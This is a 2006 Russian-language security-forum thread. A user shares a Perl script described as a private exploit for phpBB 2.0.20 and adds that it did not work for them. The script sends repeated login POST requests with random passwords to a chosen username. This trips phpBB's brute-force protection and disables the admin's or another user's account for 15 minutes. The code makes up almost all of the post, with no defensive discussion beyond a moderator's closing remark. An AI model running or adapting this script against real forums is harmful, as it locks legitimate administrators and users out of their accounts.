ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

phpBB 2.0.20 Disable Admin or User Account
  #1  
Старый 02.05.2006, 19:13
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию phpBB 2.0.20 Disable Admin or User Account

я нашел это.
но не работайте для меня.

Код:
################################################################################### 
#!/usr/bin/perl 
# Priv8 Exploit for PHPBB 2.0.20 
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min 
#Discover & Writ By : Hossein-Asgari 
# http://simorgh-ev.com 
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password ! 
# BUT : 
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable . 
# Enjoy ! 
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt 
################################################################################### 
$host=$ARGV[0]; 
$dirc=$ARGV[1]; 
$port=$ARGV[2]; 
$user=$ARGV[3]; 

$dirsend = "$dirc" . "login.php"; 
print " 
   ------------------------------------- 
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username > 
   -------------------------------------- 
   "; 
$i=1; 
if ($host ne ""){ 
while($OK ne 1){ 


use IO::Socket; 
my($socket) =""; 
   if ($socket = IO::Socket::INET->new(PeerAddr => $host , 
                                       PeerPort => $port , 
                                       Proto    => "TCP")) 
{ 


$password=rand(); 
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion 
"; 
$length = length $data; 
print $socket "POST $dirsend HTTP/1.1 
Host: $host 
Content-Type: application/x-www-form-urlencoded 
Content-Length: $length 

$data"; 
read  $socket, $answer, 15; 
close($socket); 
} 
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;} 
$i=$i+"1"; 
print "$answer 
"; 
print "Send Packet $i .... 
" ; 

}}
------------------------------------------------------------------

Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей phpBB].

Последний раз редактировалось Grey; 02.03.2007 в 19:17..
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
phpBB admin =>2.0.19 exec exploit 0verfe1 Форумы 29 14.06.2006 00:35
Вышел phpBB 2.0.20 syntacsis Мировые новости 9 08.04.2006 14:01
phpBB User id Auth. Bypass and "admin_styles" Code Injection Exploit madnet Мировые новости 3 16.03.2005 23:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ